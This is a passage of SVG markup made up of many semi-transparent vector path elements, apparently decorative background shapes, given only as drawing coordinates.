d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,